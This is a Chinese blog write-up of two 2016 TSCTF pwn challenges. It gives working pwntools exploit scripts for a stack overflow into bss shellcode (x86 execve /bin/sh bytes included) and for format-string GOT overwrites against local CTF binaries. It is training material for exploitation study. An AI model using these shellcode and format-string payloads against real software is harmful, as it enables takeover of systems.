2016 TSCTF 初赛

最新推荐文章于 2024-02-29 14:05:28 发布
最新推荐文章于 2024-02-29 14:05:28 发布
阅读量769 收藏 1
点赞数
分类专栏: Pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/think_ycx/article/details/68961458
版权

pwn1

thoughts

在第一个子函数布置shellcode(bss段的地址可定位)。

puts("I'm zhouheiya, what about you?");
read(0, &format, 0x32u);
printf(&format);

此处存在bof,计算偏移覆盖返回地址为bss段中shellcode地址即可。

puts("I'm datouerzi, what about you?");
__isoc99_scanf("%s", &format);
printf(&format);

总结

  1. 存在格式化串漏洞 & got表,可以获得printf函数的实际地址
  2. 格式化串漏洞,当format和参数都在栈上时,可以利用该漏洞 结合 函数的got表,泄漏函数的实际地址。
  3. 当存在bof时,可以使用ret2libc,布置返回地址为func的地址、虚假的返回地址、func的参数。(利用system执行/bin/sh 利用write输出地址的值)

exp

from pwn import *

debug = 1
local = 1
attach = local & 1
bps = attach & 0
proc_name = 'pwn1'
#socat TCP4-LISTEN:10001,fork EXEC:./pwn1
ip = '127.0.0.1'
port = 10001
io = None

def makeio():
    global io 
    if local:
        io = process(proc_name)
    else:
        io = remote(ip,port)
def ru(data):
    return io.recvuntil(data)
def rv():
    return io.recv()
def sl(data):
    return io.sendline(data)
def rl():
    return io.recvline()

def pwn():
    makeio()
    if debug:
        context.log_level = 'debug'
    if attach:
        if bps:
            gdb.attach(pidof(proc_name)[0], open('bps'))
        else:
            gdb.attach(pidof(proc_name)[0])
    #21 bytes
    shellcode = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73"
    shellcode += "\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0"
    shellcode += "\x0b\xcd\x80"
    sc_addr = 0x804a0a0 + 0x0c
    payload = 'huangmenji\x00\x00' + shellcode
    ru("what about you?\n");sl(payload)
    ru("what about you?\n");sl('zhaoritian')
    ru("what about you?\n");sl('beita')
    ru("what about you?\n");sl('jerry')
    payload = 'xiaotoubaba' 
    payload = payload.ljust(0x3e,'A') + p32(sc_addr)
    ru("what about you?\n");sl(payload)
    io.interactive()


if __name__ == '__main__':
    pwn()

pwn2

thoughts

  1. 存在格式化漏洞:scanf读入最多24个字节的字符串之后,该字符串直接作为printf的format输出。因此可以任意读写。
  2. 程序中存在system(“/bin/sh”)的函数地址。
  3. 利用格式化串漏洞把sys_addr 写入puts或 fflush的got表中,完成利用。
  __isoc99_scanf("%24s", &v5);
  printf("Hello ");
  printf((const char *)&v5);
  puts("!");
  fflush(stdout);

总结

  1. gdb attach时,只能attach到程序输入之后的地方。此时,eip如果很深,设置断点之后c即可回到main函数。
  2. scanf对于某些字符不能读入:

    \x00 & (if character is a white-space)

’ ‘(0x20)space (SPC)
‘\t’(0x09)horizontal tab (TAB)
‘\n’(0x0a)newline (LF)
‘\v’(0x0b)vertical tab (VT)
‘\f’(0x0c)feed (FF)
‘\r’(0x0d)carriage return (CR)

3. 常用格式化串payload:

puts = 0x0804A018
ret_addr = 0x080485AD
ret_l = ret_addr & 0xffff;ret_h = ret_addr >>16
offset = 7
payload = "%" + str(ret_h) + "c%15$hn%" + str( ret_l -ret_h) + "c%14$hnAA"
payload = payload.ljust(28,'A')
payload +=  p32(puts)  + p32(puts+0x2)   
sl(payload)
io.interactive()
  1. 计算格式化offset时,若输入长度没有限制,可以利用:
def exec_fmt(payload):  
    if local:
        p = process(proc_name)
    else:
        p = remote(ip,port)
    p.recvuntil('name\n')
    p.sendline(payload)
    info = p.recv()
    p.close()
    return info
autofmt = FmtStr(exec_fmt)  
print autofmt.offset

若payload长度没有限制,可以如此利用来写(参考pingme)

offset = 7
payload = fmtstr_payload(offset, {printf_got: system_addr})
p.sendline(payload)
  1. 利用格式化串漏洞读某个got表地址:
ru('name?\n')
payload = p32(0x0804A01C) + "%7$s"
sl(payload)
string = rv()
print "%#x" % u32(string[10:14])

exp

from pwn import *
import time

debug = 1
local = 1
attach = local & 0
bps = attach & 1
proc_name = 'pwn3'
#socat TCP4-LISTEN:10001,fork EXEC:./pwn3
ip = '127.0.0.1'
port = 10001
io = None

def makeio():
    global io 
    if local:
        io = process(proc_name)
    else:
        io = remote(ip,port)
def ru(data):
    return io.recvuntil(data)
def rv():
    return io.recv()
def sl(data):
    return io.sendline(data)
def rl():
    return io.recvline()

def pwn():
    makeio()
    if debug:
        context.log_level = 'debug'
    if attach:
        if bps:
            gdb.attach(pidof(proc_name)[0], open('bps'))
        else:
            gdb.attach(pidof(proc_name)[0])

    puts = 0x0804A018
    ret_addr = 0x080485AD
    payload = "%" +str(ret_addr)+ "c%11$n"
    payload = payload.ljust(16,'A')
    payload +=  p32(puts) 
    # writes = {puts:   ret_addr}
    # payload = fmtstr_payload(7, writes,write_size='int')
    # print payload
    sl(payload)
    io.interactive()


if __name__ == '__main__':
    pwn()
think_ycx
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
NOIP2016普及组参考答案(初赛
02-14
这是NOIP2016普及组参考答案(初赛),方便同学们对照批改。
初步学习CTF格式化字符串漏洞(待更新)
哔...的博客
03-25 931
初步学习CTF格式化字符串漏洞(待更新) 文章目录初步学习CTF格式化字符串漏洞(待更新)格式化字符串漏洞原理利用格式化字符串进行任意地址读利用格式化字符串进行任意地址写 https://veritas501.space/2017/04/28/格式化字符串漏洞学习/ 先 List item 看看例子 int main() { char s[60]; char v6 FILE* s...
i春秋·网络内生安全训练场 pwn Car Search System
qq_43677324的博客
12-01 253
i春秋·网络内生安全训练场 pwn Car Search System memcpy是memory copy的缩写,意为内存复制,在写C语言程序的时候,我们常常会用到它。它的函原型如下: void *memcpy(void *dest, const void *src, size_t n); 它的功能是从src的开始位置拷贝n个字节的数据到dest。如果dest存在数据,将会被覆盖。memcpy...
怎么在知网上查论文重复率
最新发布
Rtee1的博客
02-29 352
在使用知网查询论文重复率时,还需要注意以下几点:首先,保持高度的学术诚信,遵守学术规范和法律法规;最后,多参考相关文献和资料,增加论文的创新性和独特性。同时,建议在写作过程中注重文献引用和标注的规范性,以避免不必要的重复和误解。通过以上七个方面的介绍,相信你已经掌握了在知网上查询论文重复率的方法和技巧。使用知网的在线编辑器进行修改和调整,确保论文的原创性和质量。这份报告会列出论文中重复的内容和相似文献来源,以及相应的重复率数据。根据你的论文类型和用途,选择合适的检测版本。上传完成后,系统会自动开始检测。
TSCTF-J 2019 bypass
西部壮仔的博客
04-01 736
题目: <?php highlight_file(__FILE__); if(md5($_GET['pass']) == md5($_GET['username']) && $_GET['pass'] != $_GET['username']){ if(strpos($_GET['username'],"tsctf") === 0){ ...
物联网 嵌入式 单片机 毕设如何选题 【项目分享】
m0_71572576的博客
06-22 4万+
正在整理中,先留个位置,届时上传到CSDN下载~毕设选题实际上对很多同学来说一个大坑, 每年挖坑给自己跳的人太多太多,选题选得好后面的答辩以及论文撰写会轻松很多,选的不好就是一个无穷无尽的折磨。。。。为什么这么说呢?其实这主要是由于大部分同学对某种具体场景所需要的技术不清晰而导致的,定题的时候想当然的觉得某种功能是很好实现的,但是实际上往往并非如此。所以,建议对课题实现技术不清晰的同学,最好是找自己的研究生学长或者老师详细的把关机技术以及实现流程理清楚,当然也可以来问我。(对于只要求顺利毕业的同学)定题不能
[蓝桥杯2016初赛]方格填数
10-02
如下的10个格子 +--+--+--+ | | | | +--+--+--+--+ | | | | | +--+--+--+--+ | | | | +--+--+--+ (如果显示有问题,也可以参看【图1.jpg】) 填入0~9的数字。要求:连续的两个数字不能相邻。...
[蓝桥杯2016初赛]凑算式
10-02
这个算式中A~I代表1~9的数字,不同的字母代表不同的数字。 比如: 6+8/3+952/714 就是一种解法,5+3/1+972/486 是另一种解法。 这个算式一共有多少种解法? 答案:29
2016noip初赛(普级+提高)试题及答案c&c++&pascal
10-27
2016noip初赛(普级+提高)试题及答案c&c++&pascal
2016-2020年 CSP-J1 CSP-S1 NOIP 初赛真题 答案及解析.rar
09-12
2016-2020年 CSP-J1 CSP-S1 NOIP 初赛真题 答案及解析.rar
医学图像处理技术_上海交大---第一章笔记
wyyowyy的博客
10-28 1476
图像:自然界的真实表达 图形:由数学和计算机产生
栈溢出技巧-上
合天网安学院
03-31 1013
ASLR和PIE我们都知道由于受到堆栈和libc地址可预测的困扰,ASLR被设计出来并得到广泛应用,后来各种绕过技术出现,比如return-to-plt、got hijack、stack-...
好用的shellcode
九层台
01-25 638
给师傅要了一组好用的shellcode 1.短。 2.没有空格符,换行符 好用shellcode :shellcode_x64 = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05" shellcode_x86 = "\x31\xc9\xf7\xe1\x51...
第五届TSCTF-RE部分题解
WocW的博客
05-13 831
前言 这个周末参加了一下北邮的TSCTF,可以明确感觉到自己目前缺的是处理数据的工具或者是更高的技巧,许许多多的知识待补!有幸认识了在北邮读研的直系学长,也算是一些收获。 RE1 Checkin 分析 elf文件,IDA观察查看程序很简单。没仔细看,先上动调看看。 这里处理的第一步首先循环右移数据 ror flag[x],x 然后是直接进行已知字符对比验证。 exp a=[0x54,0xa9 ...
基于51单片机+LD3320语音模块+SYN6288语音合成——语音识别智能分类垃圾桶
热门推荐
weixin_47457689的博客
05-13 4万+
语音识别智能分类垃圾桶基本介绍器件51单片机LD3320语音模块SYN6288语音合成SG90舵机(4个)usb-ttl模块垃圾桶四个(4个)面包板(建议用)实现思路与接线实现流程图接线呈现图代码编写语音模块(部分代码)语音模块串口调试结果51单片机代码(部分代码 )项目展示 基本介绍 这个一个基于51单片机做的一个语音识别分类智能垃圾桶,通过我们说话来对垃圾词语进行分类。比如:垃圾桶(一级指令)易拉罐(垃圾词语),我们通过说话 说出关键字 让语音模块 接收到 —— 语音模块通过串口发指令给51单片机,针对
python3-pwntools教程_一步一步学pwntools
weixin_39624429的博客
12-23 1199
刚刚注册看雪,就来水一篇文章。本来想发发我之前CTF的writeups,不过数量有点多,而且网上也有很多质量不错的wp,就发回之前写的pwntools新手教程。网上纯新手教程比较少,一般都是直接调用api,这篇主要是想给新手对pwntool一个更整体的认识。原文是我用英文写的,如果翻译的不好,请见谅。英语原文:下面开始正文:序pwntools是一个二进制利用框架。官方文档提供了详细的api规范。然...
CTF pwn题之格式化字符串漏洞详解
lifanxin的博客
03-22 1万+
FmtStr格式化字符串类概念求偏移和任意地址写求偏移任意地址写一个例子程序分析漏洞利用wp总结 概念 在遇到pwn题中格式化字符串漏洞时,我们一般会分两大步实现漏洞利用:首先构造一个payload来寻找输入字符串到栈顶指针的偏移,然后利用偏移实现对目标地址的改写。下面我将介绍pwntools中的FmtStr类如何实现偏移的求解以及对目标地址的改写。 求偏移和任意地址写 求偏移 在格式化字符串漏洞利用中,我们一般都是这样手动构造payload进行偏移求解的,如下图所示,开头输入方便定位的字符串aaaa,然后
什么是知网的跨库检索?为什么我的文章在知网检索不到了?
zzqklm001的博客
11-14 2万+
最近,很多作者都在问这样一个问题:我之前发的文章,以前还能再知网查到,为什么现在查不到了? 不止一个作者有这样的问题,今天我们统一解答一下: 首先,遇到这种情况不要慌张。文章最开始的时候还能检索,说明确实是被知网收录了,再一个,在我们这里发的文章就更不用担心了,中州期刊联盟是真诚做论文的,不会存在欺骗等问题。 我们直接说一下解决的办法,到最后再解释一下原因。 案例: 一般,作者搜文章的时候,习惯性...
2016csp初赛答案
09-06
2016csp初赛答案包括四个题目,分别是: 1. 炉子温度问题:题目描述了给出了几个温度变化的事件,要求计算最后炉子的温度。解题思路是根据每个事件的类型进行相应的计算和操作。 2. 干草堆问题:题目描述了一个干草...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值